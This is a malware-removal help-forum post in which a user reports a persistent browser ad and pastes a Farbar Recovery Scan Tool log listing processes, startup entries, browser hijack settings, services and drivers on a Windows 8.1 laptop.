jrsanders69
2016-03-04, 21:25
I do believe that I have provided everything that you request in order to better help me. My problem is that I am visiting websites and a permanent ad appears in the lower right-hand corner that will not go away. It covers up the scroll bar as well. I have run S&D and AdwCleaner (both with fixes). I hope you can help.
Thanks
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:04-03-2016
Ran by Fawn (administrator) on FAWNS (04-03-2016 10:04:58)
Running from C:\Users\Fawn\Desktop
Loaded Profiles: Fawn (Available Profiles: Fawn)
Platform: Windows 8.1 Connected (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Windows\System32\DptfParticipantProcessorService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
(Intel(R) Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfefire.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McAPExe.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McUICnt.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWelcome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
(Farbar) C:\Users\Fawn\Desktop\FRST64 (2).exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-09-12] (Realtek Semiconductor)
HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\Windows\System32\DptfPolicyLpmServiceHelper.exe [111488 2014-09-05] (Intel Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2830576 2014-08-31] (Synaptics Incorporated)
HKLM-x32\...\Run: [Digital Coupon Print Driver] => "C:\Program Files (x86)\Digital Coupon Printer\DigitalCouponPrinter.exe"
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [654088 2015-02-17] (Hewlett-Packard Development Company, L.P.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\Run: [GoogleChromeAutoLaunch_C53FAD65C2D6926885C453276F0F49A1] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [746648 2016-02-17] (Google Inc.)
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\MountPoints2: {bfef5019-d8ba-11e5-8272-d85de287d87e} - "D:\windows\AutoRun.exe"
BootExecute: autocheck autochk * sdnclean64.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{2B499AA0-D03A-459F-AF7B-E066FC873886}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{973F3F7C-2B68-428F-A390-4A495C50EDD8}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{B1997D4E-969C-42FF-B8F2-0B5104AA2E37}: [DhcpNameServer] 82.163.142.7
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected&p={searchTerms}
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKLM-x32 -> {5D459A9E-3E68-439C-B3C7-036F3B49576B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-4258770641-917365270-2992294631-1001 -> {5D459A9E-3E68-439C-B3C7-036F3B49576B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-12-20] (Hewlett-Packard Company)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2016-01-08] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2016-01-08] (McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
FireFox:
========
FF ProfilePath: C:\Users\Fawn\AppData\Roaming\Mozilla\Firefox\Profiles\jhz1k2y6.default
FF NewTab: about:newtab
FF DefaultSearchEngine: Search Provided by Yahoo
FF DefaultSearchEngine.US: Search Provided by Yahoo
FF SelectedSearchEngine: Search Provided by Yahoo
FF Homepage: hxxps://www.google.com/?gws_rd=ssl
about:preferences
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-01-08] ()
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-01-08] ()
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin HKU\S-1-5-21-4258770641-917365270-2992294631-1001: @citrixonline.com/appdetectorplugin -> C:\Users\Fawn\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-03-03] (Citrix Online)
FF Extension: Simple YouTube to MP3/MP4 Converter and Downloader - C:\Users\Fawn\AppData\Roaming\Mozilla\Firefox\Profiles\jhz1k2y6.default\Extensions\jid0-SQnwtgW1b8BsMB5PLV5WScEDWOjw@jetpack.xpi [2016-03-03]
FF Extension: Youtube MP3 Downloader using youtube-mp3.org - C:\Users\Fawn\AppData\Roaming\Mozilla\Firefox\Profiles\jhz1k2y6.default\Extensions\jid1-xKH0EoS44u1a2w@jetpack.xpi [2016-02-08]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2016-02-12] [not signed]
StartMenuInternet: FIREFOX.EXE - firefox.exe
Chrome:
=======
CHR HomePage: Default -> hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected
CHR StartupUrls: Default -> "hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected"
CHR DefaultSearchURL: Default -> hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D4%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected&p={searchTerms}
CHR DefaultSearchKeyword: Default -> search provided by yahoo.com
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?client=chrome&hl={language}&q={searchTerms}
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-23]
CHR Extension: (Google Docs) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-23]
CHR Extension: (Google Drive) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-23]
CHR Extension: (YouTube) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-23]
CHR Extension: (Google Search) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-23]
CHR Extension: (Page Eraser) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekofpchjmoalonajopdeegdappocgcmj [2016-03-04]
CHR Extension: (Test IE) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\eldlkpeoddgbmpjlnpfblfpgodnojfjl [2016-02-18]
CHR Extension: (Google Sheets) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-23]
CHR Extension: (Google Docs Offline) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-24]
CHR Extension: (Popup Blocker Pro) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\kiodaajmphnkcajieajajinghpejdjai [2016-03-03]
CHR Extension: (McAfee SECURE Safe Browsing) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkdiimaiohgpacfbgedcipmgigppaofn [2016-03-03]
CHR Extension: (FromDocToPDF) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk [2016-03-04]
CHR Extension: (BrowserStack Local) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfiddfehmfdojjfdpfngagldgaaafcfo [2016-01-28]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-23]
CHR Extension: (Gmail) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-23]
CHR Extension: (Open With Firefox) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\poeacjbaiakjnaepdjgggojcjoajakmd [2016-03-03]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2013-11-13] (Broadcom Corporation.)
R2 DptfParticipantAcpiProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [115656 2014-09-05] (Intel Corporation)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26168 2015-12-20] (Hewlett-Packard Company)
R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [608520 2015-02-17] (Hewlett-Packard Development Company, L.P.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2014-09-12] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel(R) Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [863448 2016-01-08] (McAfee, Inc.)
S3 McAWFwk; c:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [332528 2014-03-12] (McAfee, Inc.)
R2 mcbootdelaystartsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe [1694152 2015-12-02] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [681680 2016-01-08] (McAfee, Inc.)
S4 McOobeSv2; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [234192 2015-11-18] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [380896 2016-01-21] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [275368 2015-11-18] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [902112 2015-12-14] (Intel Security, Inc.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [292568 2014-09-12] (Realtek Semiconductor)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-08-31] (Synaptics Incorporated)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2015-01-19] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-01-19] (Microsoft Corporation)
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 androidusb; C:\Windows\System32\Drivers\androidusb.sys [38424 2010-10-18] (Google Inc)
S3 AX88772; C:\Windows\system32\DRIVERS\ax88772.sys [113864 2013-07-18] (ASIX Electronics Corp.)
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [170712 2013-11-13] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7552760 2016-03-03] (Broadcom Corporation)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [79248 2015-11-25] (McAfee, Inc.)
R3 DptfDevAcpiProc; C:\Windows\system32\DRIVERS\DptfDevAcpiProc.sys [198808 2014-09-05] (Intel Corporation)
S3 DptfDevDisplay; C:\Windows\System32\drivers\DptfDevDisplay.sys [70752 2014-09-05] (Intel Corporation)
S3 DptfDevDram; C:\Windows\System32\drivers\DptfDevDram.sys [145640 2014-09-05] (Intel Corporation)
S3 DptfDevFan; C:\Windows\System32\drivers\DptfDevFan.sys [50640 2014-09-05] (Intel Corporation)
R3 DptfDevGen; C:\Windows\system32\DRIVERS\DptfDevGen.sys [78504 2014-09-05] (Intel Corporation)
S3 DptfDevPch; C:\Windows\System32\drivers\DptfDevPch.sys [116752 2014-09-05] (Intel Corporation)
S3 DptfDevPower; C:\Windows\System32\drivers\DptfDevPower.sys [71808 2014-09-05] (Intel Corporation)
R3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [493240 2014-09-05] (Intel Corporation)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207208 2015-05-19] (McAfee, Inc.)
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2014-08-04] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [419624 2015-11-25] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [351144 2015-11-25] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83096 2015-11-25] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [496368 2015-11-25] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [846080 2015-11-25] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [539496 2015-11-20] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2015-11-20] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [245096 2015-11-25] (McAfee, Inc.)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [294104 2014-08-25] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [30448 2014-08-31] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [31472 2014-08-31] (Synaptics Incorporated)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
